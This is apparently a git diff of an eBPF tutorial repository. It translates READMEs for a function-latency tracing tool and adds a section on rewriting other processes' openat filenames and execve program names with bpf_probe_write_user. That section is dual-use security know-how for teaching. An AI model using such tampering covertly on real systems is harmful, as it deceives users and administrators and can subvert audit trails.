程序收集的数据可以导出到用户空间进行分析,使其成为系统可观测性的重要工具。内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 +eBPF programs are executed in a sandboxed environment within the kernel, ensuring safety and stability. These programs can attach to various hooks within the kernel, such as system calls, network events, and tracepoints, or even user-space functions using uprobes (user-level probes). The data collected by eBPF programs can then be exported to user space for analysis, making it an invaluable tool for system observability. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. 
In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). -## 为什么函数延迟很重要? +## Why is Function Latency Important? -函数延迟是内核和用户空间应用程序性能分析中的一个关键指标。它提供了关于特定函数执行时间的洞察,这对以下方面至关重要: +Function latency is a critical metric in performance analysis for both kernel and user-space applications. It provides insights into how long a particular function takes to execute, which is crucial for: -- **识别性能瓶颈**:高函数延迟可能表明代码中存在需要优化的低效或问题。 -- **确保系统响应能力**:在实时系统或对延迟敏感的应用程序中,理解和最小化函数延迟对于保持响应能力至关重要。 -- **性能分析和基准测试**:通过测量各种函数的延迟,开发人员可以对系统进行基准测试,并比较不同实现或配置的性能。 -- **调试和诊断**:当系统表现出意外行为或性能下降时,测量函数延迟可以帮助定位问题的根源。 +- **Identifying Performance Bottlenecks**: High function latency may indicate inefficiencies or issues within the code that need optimization. +- **Ensuring System Responsiveness**: In real-time systems or latency-sensitive applications, understanding and minimizing function latency is essential to maintain responsiveness. +- **Profiling and Benchmarking**: By measuring the latency of various functions, developers can benchmark their systems and compare the performance of different implementations or configurations. +- **Debugging and Diagnostics**: When a system exhibits unexpected behavior or performance degradation, measuring function latency can help pinpoint the source of the problem. -内核空间(如系统调用、文件操作)和用户空间(如库函数)中的函数都可以进行延迟分析,从而提供系统性能的全面视图。 +Both kernel-space (e.g., system calls, file operations) and user-space (e.g., library functions) functions can be profiled for latency, providing a comprehensive view of system performance. -## 用于函数延迟的 eBPF 内核代码 +## eBPF Kernel Code for Function Latency -以下是一个设计用于测量函数延迟的 eBPF 程序,它通过挂钩函数的入口和出口点来实现。该程序使用 kprobes 和 kretprobes(用于内核函数)或 uprobes 和 uretprobes(用于用户空间函数)来捕获函数执行的开始和结束时间。 +Below is an eBPF program designed to measure the latency of a function by hooking into its entry and exit points. The program uses kprobes and kretprobes (for kernel functions) or uprobes and uretprobes (for user-space functions) to capture the start and end times of the function execution. ```c // SPDX-License-Identifier: GPL-2.0 @@ -107,27 +107,27 @@ int BPF_KRETPROBE(dummy_kretprobe) char LICENSE[] SEC("license") = "GPL"; ``` -### 代码解释 +### Explanation of the Code -1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 +1. **Header Files**: The code begins by including the necessary headers like `vmlinux.h` (which provides kernel definitions) and `bpf_helpers.h` (which offers helper functions for eBPF programs). -2. **全局变量**:`targ_tgid` 是目标进程 ID(或线程组 ID),`units` 确定延迟测量的时间单位(如微秒或毫秒)。 +2. **Global Variables**: `targ_tgid` is a target process ID (or thread group ID), and `units` determines the time unit for latency measurement (e.g., microseconds or milliseconds). -3. **BPF 映射**:定义了一个哈希映射(`starts`),用于存储每个进程 ID 的函数执行开始时间。另一个数组(`hist`)用于存储延迟分布。 +3. **BPF Maps**: A hash map (`starts`) is defined to store the start time of function executions for each process ID. Another array (`hist`) is used to store the latency distribution. -4. **入口函数**:`entry()` 函数在函数进入时捕获当前时间戳,并将其存储在以进程 ID 为键的 `starts` 映射中。 +4. **Entry Function**: The `entry()` function captures the current timestamp when the function is entered and stores it in the `starts` map keyed by the process ID. -5. **出口函数**:`exit()` 函数通过将存储的开始时间与当前时间相减来计算延迟。然后将结果分类到直方图槽中,并增加该槽的计数以记录该延迟范围的发生次数。 +5. **Exit Function**: The `exit()` function calculates the latency by subtracting the stored start time from the current time. 
The result is then categorized into a histogram slot, which is incremented to record the occurrence of that latency range.

-6. **探针**:`kprobe` 和 `kretprobe` 用于附加到函数的入口和出口点。这些探针触发 `entry()` 和 `exit()` 函数来测量延迟。
+6. **Probes**: The `kprobe` and `kretprobe` are used to attach to the entry and exit points of the function, respectively. These probes trigger the `entry()` and `exit()` functions to measure the latency.

-7. **许可证**:该程序根据 GPL 许可证发布,以确保符合内核的许可要求。
+7. **License**: The program is licensed under GPL to ensure compliance with kernel licensing requirements.

-## 运行函数延迟工具
+## Running the Function Latency Tool

-### 用户空间函数延迟
+### User-Space Function Latency

-要跟踪用户空间函数(例如 `libc` 库中的 `read` 函数)的延迟,可以运行以下命令:
+To trace the latency of a user-space function, such as the `read` function in the `libc` library, you can run the following command:

```console
# ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read
@@ -152,9 +152,9 @@ Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit
Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read
```

-### 内核空间函数延迟
+### Kernel-Space Function Latency

-要跟踪内核空间函数(例如 `vfs_read`)的延迟,可以运行以下命令:
+To trace the latency of a kernel-space function, such as `vfs_read`, run the following command:

```console
# sudo ./funclatency -u vfs_read
@@ -168,22 +168,22 @@ Tracing vfs_read. Hit Ctrl-C to exit
      64 -> 127   : 184  |**  |
    1024 -> 2047  : 0    |    |
    4096 -> 8191  : 5    |    |
- 2097152 ->
-
-4194303 : 2 | |
+ 2097152 -> 4194303 : 2 | |
Exiting trace of vfs_read
```

-这些命令会跟踪指定函数(无论是在用户空间还是内核空间)的执行,并打印出观察到的延迟的直方图,显示函数执行时间的分布。
+These commands trace the execution of the specified function, either in user-space or kernel-space, and print a histogram of the observed latencies, showing the distribution of function execution times.

-
+You can find the source code in

-## 结论
+## Conclusion

-使用 eBPF 测量函数延迟可以深入了解用户空间和内核空间代码的性能。通过了解函数延迟,开发人员可以识别性能瓶颈、提高系统响应能力,并确保其应用程序的顺畅运行。
+Measuring function latency with eBPF offers deep insights into the performance of both user-space and kernel-space code. By understanding function latency, developers can identify performance bottlenecks, improve system responsiveness, and ensure the smooth operation of their applications.

-本文介绍了使用 eBPF 跟踪函数延迟的基本知识,包括实现该跟踪功能的 eBPF 内核代码概述。文中提供的示例展示了如何运行工具以跟踪用户空间和内核空间函数的延迟。
+This blog post covered the basics of using eBPF to trace function latency, including an overview of the eBPF kernel code used to perform the tracing. The examples provided demonstrated how to run the tool to trace both user-space and kernel-space functions.

-如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的[教程代码库](https://github.com/eunomia-bpf/bpf-developer-tutorial)或我们的网站 [Eunomia](https://eunomia.dev/tutorials/)。
+For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [Eunomia](https://eunomia.dev/tutorials/).

-如果您正在寻找一个用于函数延迟测量的生产就绪工具,您可能想查看 BCC 仓库中的完整实现:[BCC 仓库](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c)。
+
+If you are looking for a production-ready tool for function latency measurement, you might want to check out the full implementation available in the [BCC repository](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c).
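One piece the diff never shows is `bits.bpf.h`, which supplies the `log2l` helper used to pick a histogram slot. For reference, a sketch along the lines of the helper shipped with BCC's libbpf-tools (treat it as illustrative, not the exact header from this repository):

```c
/* Branch-light floor(log2) helpers: map a latency delta to its
 * power-of-two histogram slot. Modeled on BCC's bits.bpf.h. */
static __always_inline u64 log2(u32 v)
{
    u32 shift, r;

    r = (v > 0xFFFF) << 4; v >>= r;
    shift = (v > 0xFF) << 3; v >>= shift; r |= shift;
    shift = (v > 0xF) << 2; v >>= shift; r |= shift;
    shift = (v > 0x3) << 1; v >>= shift; r |= shift;
    r |= (v >> 1);

    return r;
}

static __always_inline u64 log2l(u64 v)
{
    u32 hi = v >> 32;

    if (hi)
        return log2(hi) + 32;
    return log2(v);
}
```

With this, `slot = log2l(delta)` in `exit()` turns, say, a 70 µs delta into slot 6, i.e. the `64 -> 127` bucket in the output above.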
diff --git a/src/33-funclatency/README.zh.md b/src/33-funclatency/README.zh.md new file mode 100644 index 0000000..2fe33b1 --- /dev/null +++ b/src/33-funclatency/README.zh.md @@ -0,0 +1,189 @@ +# 使用 eBPF 测量函数延迟 + +在现代软件系统中,了解函数的性能特性,尤其是那些对应用程序运行至关重要的函数的性能特性,是至关重要的。性能分析中的一个关键指标是**函数延迟**,即函数从开始到完成所花费的时间。通过分析函数延迟,开发人员可以识别瓶颈、优化性能,并确保系统在各种条件下高效运行。 + +本文将深入探讨如何使用 eBPF 这一强大的工具来测量函数延迟,并展示如何在内核和用户空间中进行跟踪和监控。 + +## 什么是 eBPF? + +eBPF(扩展伯克利包过滤器)是一项革命性的技术,它允许开发人员编写小型程序在 Linux 内核中运行。eBPF 最初是为数据包过滤设计的,但它已经发展成为一个多功能工具,用于跟踪、监控和分析系统行为。通过 eBPF,您几乎可以对 Linux 内核或用户空间的任何部分进行插桩,从而收集性能数据、执行安全策略,甚至实时调试系统——这一切都无需修改内核源码或重启系统。 + +eBPF 程序在内核的沙盒环境中执行,确保了安全性和稳定性。这些程序可以附加到内核中的各种钩子上,如系统调用、网络事件和跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。eBPF 程序收集的数据可以导出到用户空间进行分析,使其成为系统可观测性的重要工具。内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 + +## 为什么函数延迟很重要? + +函数延迟是内核和用户空间应用程序性能分析中的一个关键指标。它提供了关于特定函数执行时间的洞察,这对以下方面至关重要: + +- **识别性能瓶颈**:高函数延迟可能表明代码中存在需要优化的低效或问题。 +- **确保系统响应能力**:在实时系统或对延迟敏感的应用程序中,理解和最小化函数延迟对于保持响应能力至关重要。 +- **性能分析和基准测试**:通过测量各种函数的延迟,开发人员可以对系统进行基准测试,并比较不同实现或配置的性能。 +- **调试和诊断**:当系统表现出意外行为或性能下降时,测量函数延迟可以帮助定位问题的根源。 + +内核空间(如系统调用、文件操作)和用户空间(如库函数)中的函数都可以进行延迟分析,从而提供系统性能的全面视图。 + +## 用于函数延迟的 eBPF 内核代码 + +以下是一个设计用于测量函数延迟的 eBPF 程序,它通过挂钩函数的入口和出口点来实现。该程序使用 kprobes 和 kretprobes(用于内核函数)或 uprobes 和 uretprobes(用于用户空间函数)来捕获函数执行的开始和结束时间。 + +```c +// SPDX-License-Identifier: GPL-2.0 +/* Copyright (c) 2021 Google LLC. */ +#include "vmlinux.h" +#include +#include +#include +#include "funclatency.h" +#include "bits.bpf.h" + +const volatile pid_t targ_tgid = 0; +const volatile int units = 0; + +/* key: pid. value: start time */ +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_PIDS); + __type(key, u32); + __type(value, u64); +} starts SEC(".maps"); + +__u32 hist[MAX_SLOTS] = {}; + +static void entry(void) +{ + u64 id = bpf_get_current_pid_tgid(); + u32 tgid = id >> 32; + u32 pid = id; + u64 nsec; + + if (targ_tgid && targ_tgid != tgid) + return; + nsec = bpf_ktime_get_ns(); + bpf_map_update_elem(&starts, &pid, &nsec, BPF_ANY); +} + +SEC("kprobe/dummy_kprobe") +int BPF_KPROBE(dummy_kprobe) +{ + entry(); + return 0; +} + +static void exit(void) +{ + u64 *start; + u64 nsec = bpf_ktime_get_ns(); + u64 id = bpf_get_current_pid_tgid(); + u32 pid = id; + u64 slot, delta; + + start = bpf_map_lookup_elem(&starts, &pid); + if (!start) + return; + + delta = nsec - *start; + + switch (units) { + case USEC: + delta /= 1000; + break; + case MSEC: + delta /= 1000000; + break; + } + + slot = log2l(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&hist[slot], 1); +} + +SEC("kretprobe/dummy_kretprobe") +int BPF_KRETPROBE(dummy_kretprobe) +{ + exit(); + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +### 代码解释 + +1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 + +2. **全局变量**:`targ_tgid` 是目标进程 ID(或线程组 ID),`units` 确定延迟测量的时间单位(如微秒或毫秒)。 + +3. **BPF 映射**:定义了一个哈希映射(`starts`),用于存储每个进程 ID 的函数执行开始时间。另一个数组(`hist`)用于存储延迟分布。 + +4. **入口函数**:`entry()` 函数在函数进入时捕获当前时间戳,并将其存储在以进程 ID 为键的 `starts` 映射中。 + +5. **出口函数**:`exit()` 函数通过将存储的开始时间与当前时间相减来计算延迟。然后将结果分类到直方图槽中,并增加该槽的计数以记录该延迟范围的发生次数。 + +6. **探针**:`kprobe` 和 `kretprobe` 用于附加到函数的入口和出口点。这些探针触发 `entry()` 和 `exit()` 函数来测量延迟。 + +7. **许可证**:该程序根据 GPL 许可证发布,以确保符合内核的许可要求。 + +## 运行函数延迟工具 + +### 用户空间函数延迟 + +要跟踪用户空间函数(例如 `libc` 库中的 `read` 函数)的延迟,可以运行以下命令: + +```console +# ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read +tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read... 
+tracing func read in /usr/lib/x86_64-linux-gnu/libc.so.6... +Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit +^C + nsec : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 128 -> 255 : 0 | | + 512 -> 1023 : 0 | | + 65536 -> 131071 : 651 |****************************************+| + 131072 -> 262143 : 107 |****** | + 262144 -> 524287 : 36 |** | + 524288 -> 1048575 : 8 | | + 8388608 -> 16777215 : 2 | | +Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read +``` + +### 内核空间函数延迟 + +要跟踪内核空间函数(例如 `vfs_read`)的延迟,可以运行以下命令: + +```console +# sudo ./funclatency -u vfs_read +Tracing vfs_read. Hit Ctrl-C to exit +^C + usec : count distribution + 0 -> 1 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 3397 |****************************************| + 32 -> 63 : 2175 |************************* | + 64 -> 127 : 184 |** | + 1024 -> 2047 : 0 | | + 4096 -> 8191 : 5 | | + 2097152 -> + +4194303 : 2 | | +Exiting trace of vfs_read +``` + +这些命令会跟踪指定函数(无论是在用户空间还是内核空间)的执行,并打印出观察到的延迟的直方图,显示函数执行时间的分布。 + + + +## 结论 + +使用 eBPF 测量函数延迟可以深入了解用户空间和内核空间代码的性能。通过了解函数延迟,开发人员可以识别性能瓶颈、提高系统响应能力,并确保其应用程序的顺畅运行。 + +本文介绍了使用 eBPF 跟踪函数延迟的基本知识,包括实现该跟踪功能的 eBPF 内核代码概述。文中提供的示例展示了如何运行工具以跟踪用户空间和内核空间函数的延迟。 + +如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的[教程代码库](https://github.com/eunomia-bpf/bpf-developer-tutorial)或我们的网站 [Eunomia](https://eunomia.dev/tutorials/)。 + +如果您正在寻找一个用于函数延迟测量的生产就绪工具,您可能想查看 BCC 仓库中的完整实现:[BCC 仓库](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c)。 diff --git a/src/33-funclatency/README_en.md b/src/33-funclatency/README_en.md deleted file mode 100644 index 83c19f7..0000000 --- a/src/33-funclatency/README_en.md +++ /dev/null @@ -1,189 +0,0 @@ -# Measuring Function Latency with eBPF - -In modern software systems, understanding the performance characteristics of functions—especially those critical to the operation of your application—is paramount. One key metric in performance analysis is **function latency**, which is the time taken by a function to execute from start to finish. By analyzing function latency, developers can identify bottlenecks, optimize performance, and ensure that their systems operate efficiently under various conditions. - -This blog post will dive into how to measure function latency using eBPF, an incredibly powerful tool for tracing and monitoring both kernel and user-space programs. - -## What is eBPF? - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology that allows developers to write small programs that run in the Linux kernel. Originally designed for packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior. With eBPF, you can instrument almost any part of the Linux kernel or user-space programs to collect performance data, enforce security policies, or even debug systems in real time—all without the need to modify the kernel source code or restart the system. - -eBPF programs are executed in a sandboxed environment within the kernel, ensuring safety and stability. These programs can attach to various hooks within the kernel, such as system calls, network events, and tracepoints, or even user-space functions using uprobes (user-level probes). The data collected by eBPF programs can then be exported to user space for analysis, making it an invaluable tool for system observability. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. 
In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). - -## Why is Function Latency Important? - -Function latency is a critical metric in performance analysis for both kernel and user-space applications. It provides insights into how long a particular function takes to execute, which is crucial for: - -- **Identifying Performance Bottlenecks**: High function latency may indicate inefficiencies or issues within the code that need optimization. -- **Ensuring System Responsiveness**: In real-time systems or latency-sensitive applications, understanding and minimizing function latency is essential to maintain responsiveness. -- **Profiling and Benchmarking**: By measuring the latency of various functions, developers can benchmark their systems and compare the performance of different implementations or configurations. -- **Debugging and Diagnostics**: When a system exhibits unexpected behavior or performance degradation, measuring function latency can help pinpoint the source of the problem. - -Both kernel-space (e.g., system calls, file operations) and user-space (e.g., library functions) functions can be profiled for latency, providing a comprehensive view of system performance. - -## eBPF Kernel Code for Function Latency - -Below is an eBPF program designed to measure the latency of a function by hooking into its entry and exit points. The program uses kprobes and kretprobes (for kernel functions) or uprobes and uretprobes (for user-space functions) to capture the start and end times of the function execution. - -```c -// SPDX-License-Identifier: GPL-2.0 -/* Copyright (c) 2021 Google LLC. */ -#include "vmlinux.h" -#include -#include -#include -#include "funclatency.h" -#include "bits.bpf.h" - -const volatile pid_t targ_tgid = 0; -const volatile int units = 0; - -/* key: pid. value: start time */ -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_PIDS); - __type(key, u32); - __type(value, u64); -} starts SEC(".maps"); - -__u32 hist[MAX_SLOTS] = {}; - -static void entry(void) -{ - u64 id = bpf_get_current_pid_tgid(); - u32 tgid = id >> 32; - u32 pid = id; - u64 nsec; - - if (targ_tgid && targ_tgid != tgid) - return; - nsec = bpf_ktime_get_ns(); - bpf_map_update_elem(&starts, &pid, &nsec, BPF_ANY); -} - -SEC("kprobe/dummy_kprobe") -int BPF_KPROBE(dummy_kprobe) -{ - entry(); - return 0; -} - -static void exit(void) -{ - u64 *start; - u64 nsec = bpf_ktime_get_ns(); - u64 id = bpf_get_current_pid_tgid(); - u32 pid = id; - u64 slot, delta; - - start = bpf_map_lookup_elem(&starts, &pid); - if (!start) - return; - - delta = nsec - *start; - - switch (units) { - case USEC: - delta /= 1000; - break; - case MSEC: - delta /= 1000000; - break; - } - - slot = log2l(delta); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&hist[slot], 1); -} - -SEC("kretprobe/dummy_kretprobe") -int BPF_KRETPROBE(dummy_kretprobe) -{ - exit(); - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -### Explanation of the Code - -1. **Header Files**: The code begins by including the necessary headers like `vmlinux.h` (which provides kernel definitions) and `bpf_helpers.h` (which offers helper functions for eBPF programs). - -2. **Global Variables**: `targ_tgid` is a target process ID (or thread group ID), and `units` determines the time unit for latency measurement (e.g., microseconds or milliseconds). - -3. 
**BPF Maps**: A hash map (`starts`) is defined to store the start time of function executions for each process ID. Another array (`hist`) is used to store the latency distribution. - -4. **Entry Function**: The `entry()` function captures the current timestamp when the function is entered and stores it in the `starts` map keyed by the process ID. - -5. **Exit Function**: The `exit()` function calculates the latency by subtracting the stored start time from the current time. The result is then categorized into a histogram slot, which is incremented to record the occurrence of that latency range. - -6. **Probes**: The `kprobe` and `kretprobe` are used to attach to the entry and exit points of the function, respectively. These probes trigger the `entry()` and `exit()` functions to measure the latency. - -7. **License**: The program is licensed under GPL to ensure compliance with kernel licensing requirements. - -## Running the Function Latency Tool - -### User-Space Function Latency - -To trace the latency of a user-space function, such as the `read` function in the `libc` library, you can run the following command: - -```console -# ./funclatency /usr/lib/x86_64-linux-gnu/libc.so.6:read -tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read... -tracing func read in /usr/lib/x86_64-linux-gnu/libc.so.6... -Tracing /usr/lib/x86_64-linux-gnu/libc.so.6:read. Hit Ctrl-C to exit -^C - nsec : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 128 -> 255 : 0 | | - 512 -> 1023 : 0 | | - 65536 -> 131071 : 651 |****************************************+| - 131072 -> 262143 : 107 |****** | - 262144 -> 524287 : 36 |** | - 524288 -> 1048575 : 8 | | - 8388608 -> 16777215 : 2 | | -Exiting trace of /usr/lib/x86_64-linux-gnu/libc.so.6:read -``` - -### Kernel-Space Function Latency - -To trace the latency of a kernel-space function, such as `vfs_read`, run the following command: - -```console -# sudo ./funclatency -u vfs_read -Tracing vfs_read. Hit Ctrl-C to exit -^C - usec : count distribution - 0 -> 1 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 3397 |****************************************| - 32 -> 63 : 2175 |************************* | - 64 -> 127 : 184 |** | - 1024 -> 2047 : 0 | | - 4096 -> 8191 : 5 | | - 2097152 -> 4194303 : 2 | | -Exiting trace of vfs_read -``` - -These commands trace the execution of the specified function, either in user-space or kernel-space, and print a histogram of the observed latencies, showing the distribution of function execution times. - -You can find the source code in - -## Conclusion - -Measuring function latency with eBPF offers deep insights into the performance of both user-space and kernel-space code. By understanding function latency, developers can identify performance bottlenecks, improve system responsiveness, and ensure the smooth operation of their applications. - -This - - blog post covered the basics of using eBPF to trace function latency, including an overview of the eBPF kernel code used to perform the tracing. The examples provided demonstrated how to run the tool to trace both user-space and kernel-space functions. - -For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). 
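One detail the text above glosses over is how the `dummy_kprobe`/`dummy_kretprobe` programs end up on a real function: user space re-targets them at attach time. A minimal loader sketch using libbpf's attach API — the skeleton type and program handles here are assumptions based on the section names, not code from this repository:

```c
#include <bpf/libbpf.h>
#include "funclatency.skel.h" /* generated skeleton; name assumed */

/* Attach the generic entry/exit programs to a user-chosen kernel function. */
static int attach_probes(struct funclatency_bpf *obj, const char *func)
{
    struct bpf_link *entry_link, *exit_link;

    entry_link = bpf_program__attach_kprobe(obj->progs.dummy_kprobe,
                                            false /* entry probe */, func);
    if (!entry_link)
        return -1;

    exit_link = bpf_program__attach_kprobe(obj->progs.dummy_kretprobe,
                                           true /* return probe */, func);
    return exit_link ? 0 : -1;
}
```

For user-space targets, the same idea applies with `bpf_program__attach_uprobe` and an offset resolved from the target binary.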
-
-If you are looking for a production-ready tool for function latency measurement, you might want to check out the full implementation available in the [BCC repository](https://github.com/iovisor/bcc/blob/master/libbpf-tools/funclatency.c).

diff --git a/src/34-syscall/README.md b/src/34-syscall/README.md
index c2b63ab..e64e5f5 100644
--- a/src/34-syscall/README.md
+++ b/src/34-syscall/README.md
@@ -1,22 +1,22 @@
-# eBPF 开发实践:使用 eBPF 修改系统调用参数
+# eBPF Development Practice: Modifying System Call Arguments with eBPF

-eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。
+eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows user-defined code to be run, loaded, and updated without the need to modify kernel source code or reboot the kernel. This functionality has enabled a wide range of applications for eBPF, such as network and system performance analysis, packet filtering, and security policies.

-本教程介绍了如何使用 eBPF 修改正在进行的系统调用参数。这种技术可以用作安全审计、系统监视、或甚至恶意行为。然而需要特别注意,篡改系统调用参数可能对系统的稳定性和安全性带来负面影响,因此必须谨慎使用。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改系统调用参数,在内核读取用户空间内存之前,将其修改为我们想要的值。
+In this tutorial, we will explore how to use eBPF to modify the arguments of a running system call. This technique can be used for security auditing, system monitoring, or even malicious behavior. However, it is important to note that modifying system call arguments can have negative implications for system stability and security, so caution must be exercised. To implement this functionality, we will use the `bpf_probe_write_user` feature of eBPF, which allows us to modify memory in the user space and therefore modify system call arguments before the kernel reads them from user space.

-本文的完整代码可以在 找到。
+The complete code for this tutorial can be found in the repository on GitHub.

-## 修改 open 系统调用的文件名
+## Modifying the File Name of the `open` System Call

-此功能用于修改 `openat` 系统调用的参数,让它打开一个不同的文件。这个功能可能可以用于:
+This functionality is used to modify the arguments of the `openat` system call to open a different file. This technique can be useful for:

-1. **文件访问审计**:在对法律合规性和数据安全性有严格要求的环境中,审计员可能需要记录所有对敏感文件的访问行为。通过修改 `openat` 系统调用参数,可以将所有尝试访问某个敏感文件的行为重定向到一个备份文件或者日志文件。
-2. **安全沙盒**:在开发早期阶段,可能希望监控应用程序尝试打开的文件。通过更改 `openat` 调用,可以让应用在一个安全的沙盒环境中运行,所有文件操作都被重定向到一个隔离的文件系统路径。
-3. **敏感数据保护**:对于存储有敏感信息的文件,例如配置文件中包含有数据库密码,一个基于 eBPF 的系统可以将这些调用重定向到一个加密的或暂存的位置,以增强数据安全性。
+1. **File Access Auditing**: In environments with strict legal and data security requirements, auditors may need to record access to sensitive files. By modifying the `openat` system call arguments, all attempts to access a specific sensitive file can be redirected to a backup file or a log file.
+2. **Secure Sandbox**: In the early stages of development, it may be desirable to monitor the files accessed by an application. By changing the `openat` calls, the application can be run in a secure sandbox environment where all file operations are redirected to an isolated file system path.
+3. **Sensitive Data Protection**: For files containing sensitive information, such as a configuration file that contains database passwords, an eBPF-based system can redirect those calls to an encrypted or temporary location to enhance data security.

-如果该技术被恶意软件利用,攻击者可以重定向文件操作,导致数据泄漏或者破坏数据完整性。例如,程序写入日志文件时,攻击者可能将数据重定向到控制的文件中,干扰审计跟踪。
+If leveraged by malicious software, this technique can be used to redirect file operations, resulting in data leaks or compromised data integrity.
For example, when a program is writing to a log file, an attacker could redirect the data to a controlled file, disrupting the audit trail. -内核态代码(部分,完整内容请参考 Github bpf-developer-tutorial): +Kernel code (partial code, see complete code on Github bpf-developer-tutorial): ```c SEC("tracepoint/syscalls/sys_enter_openat") @@ -42,22 +42,22 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx } ``` -分析内核态代码: +Analysis of the kernel code: -- `bpf_get_current_pid_tgid()` 获取当前进程ID。 -- 如果指定了 `target_pid` 并且不匹配当前进程ID,函数直接返回。 -- 我们创建一个 `args_t` 结构来存储文件名和标志。 -- 使用 `bpf_probe_write_user` 修改用户空间内存中的文件名为 "hijacked"。 +- `bpf_get_current_pid_tgid()` retrieves the current process ID. +- If `target_pid` is specified and does not match the current process ID, the function returns 0 and does not execute further. +- We create an `args_t` structure to store the file name and flags. +- We use `bpf_probe_write_user` to modify the file name in the user space memory to "hijacked". -eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +The `eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolchain aimed at making eBPF program development, building, distribution, and execution easier. You can refer to or for installing ecc compiler toolchain and ecli runtime. We will use `eunomia-bpf` to compile and run this example. -编译: +Compile the code: ```bash ./ecc open_modify.bpf.c open_modify.h ``` -使用 make 构建一个简单的 victim 程序,用来测试: +Build a simple victim program using make for testing: ```c int main() @@ -88,7 +88,7 @@ int main() } ``` -测试代码编译并运行: +Compile and run the test code: ```sh $ ./victim @@ -98,13 +98,13 @@ Closing test.txt... test.txt closed ``` -可以使用以下命令指定应修改其 `openat` 系统调用参数的目标进程ID: +Use the following command to specify the target process ID to modify the `openat` system call arguments: ```bash sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) ``` -然后就会发现输出变成了 world,可以看到我们原先想要打开 "my_test.txt" 文件,但是实际上被劫持打开了 hijacked 文件: +You will see that the output changes to "world". Instead of opening the "my_test.txt" file, it opens the "hijacked" file: ```console test.txt opened, fd=3 @@ -121,11 +121,11 @@ test.txt opened, fd=3 read 5 bytes: world ``` -包含测试用例的完整代码可以在 找到。 +The complete code with test cases can be found in the repository. -## 修改 bash execve 的进程名称 +## Modifying the Process Name of bash `execve` -这段功能用于当 `execve` 系统调用进行时修改执行程序名称。在一些审计或监控场景,这可能用于记录特定进程的行为或修改其行为。然而,此类篡改可能会造成混淆,使得用户或管理员难以确定系统实际执行的程序是什么。最严重的风险是,如果恶意用户能够控制 eBPF 程序,他们可以将合法的系统命令重定向到恶意软件,造成严重的安全威胁。 +This functionality is used to modify the program name when the `execve` system call is made. In certain auditing or monitoring scenarios, this may be used to track the behavior of specific processes or modify their behavior. However, such modifications can lead to confusion and make it difficult for users or administrators to determine the actual program being executed by the system. The most serious risk is that if malicious users are able to control the eBPF program, they could redirect legitimate system commands to malicious software, resulting in a significant security threat. 
